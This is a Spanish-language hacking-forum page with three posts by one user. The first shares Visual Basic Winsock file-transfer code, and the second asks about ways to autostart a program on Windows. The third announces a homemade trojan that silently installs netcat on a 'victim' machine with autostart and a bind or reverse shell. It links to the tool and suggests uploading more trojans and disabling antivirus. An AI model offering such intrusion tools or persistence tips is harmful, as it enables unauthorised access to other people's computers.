elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Temas
Páginas: [1]
1  Programación / Programación Visual Basic / Problema transferencia de archivos con winsock en: 15 Abril 2006, 02:33 am
Wenas. La cosa es que no consigo hacer que funcione correctamente me estoy komiendo la kabeza y fijo que es una gilipoyez lo que me falta pero weno, a ver si me echa una mano alguien y tal.... Salu2
CLIENTE:
Código:
Private Sub command1_click()
Dim fragmento As Integer, ruta As String
Dim tamaño As Long
Dim contador As Long
Dim buffer As String
Dim archivo, lectura As String
archivo = FreeFile
contador = 0
ruta = "C:\hola.jpg"
Open ruta For Binary As #archivo
tamaño = FileLen(ruta)
ws.SendData "enviar|" & ruta & "|" & tamaño & "|"


fragmento = 8192 '8 kb


While contador < tamaño
    lectura = Input(fragmento, #archivo) 'Leer 8 kb del archiv
    ws.SendData lectura
    contador = contador + 8192
Wend
Close #archivo
End Sub


SERVIDOR:
Código:
'Declaraciones globales:
Dim transfiriendo As Boolean
Dim ruta As String * 50
Dim tamaño As Long
Dim contador As Long
Private Sub Ws_DataArrival(ByVal bytesTotal As Long)
   Dim datos As String, datos2() As String
   ws.GetData datos
   If Left(datos, 6) = "enviar" Then
   datos2 = Split(datos, "|")
   ruta = datos2(1)
   tamaño = datos2(2)
   transfiriendo = True
end sub
   End If
   If contador < tamaño Then
   If transfiriendo = True Then
   Open ruta For Binary Access Write As #1
   Seek #1, LOF(1) + 1
   Put #1, , datos
   Close #1
   End If
   contador = contador + 8192
   End If
   If contador >= tamaño Then
   transfiriendo = False
   End If
End Sub
2  Programación / Programación Visual Basic / Cuantas formas hay de iniciar server al inicio de win ? en: 11 Abril 2006, 14:33 pm
Pos esa es mi pregunta, a ver si me dais wenas ideas, yo las que konozco son:
en nt/xp
Clave run del registro
Añadirse como servicio
en 98:
clave run y autoexec

Cuales mas se pueden implementar desde VB ?
3  Seguridad Informática / Hacking / Pekeña aplicacion para instalar netcat en otro pc, hecho x mi. NetCaTroyan. en: 19 Abril 2005, 18:51 pm
holas mi nick real es ^Nous^ pero se me fue la pinza al registrarme xDD.
weno he hecho una kutrada pa instalar el netcat al pardillo de turno, lo que hace este prog es bajarse el nc de una web, instalarlo en el directorio del  sistema y que se inicie siempre que se arranke win.
tambien trae un edit server para elegir si kieres simplemente abrirle un puerto a la victima y conectarte o si prefieres que se te conecte el por reverse shelll.
un fallo que tiene es que solo funciona si editas el server una sola vez, la 2ª ya no lo guarda, asike mejor que no os ekibokeis o simpelemente borrais la karpeta y deskompriimis otra vez, asi ya podeis volver a editar el server, el q x cierto esta comprimido en upx.

ya solo decir que el diseño es mas que kutre xDDD pero que kieres si lo he hecho en 15-20mins.

enlace: http://www.gratisweb.com/nc2k5/NetCaTroyanBy^Nous^.rar


ale ya podeis ponerme verde x esta p**a bazofia xD.

weno ya sabreis que despues de que le paseis el server al tio no tendreis shell hasta que no reinicie xq no he puesto pa que se ejecute el netcat ... jeje y paso de hacer que se reinicie el pc despues de descargar el netcat xq sino canta mucho. despues si eso esta noche hago que se ejecute el netcat despues de ser descargado y asi no tener que esperar a que reinicien el pc... como ya todos sabreis despues con la shell podeis subir vuestros troyanos o haceros un user  detener AVs y firewalls.... xao.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines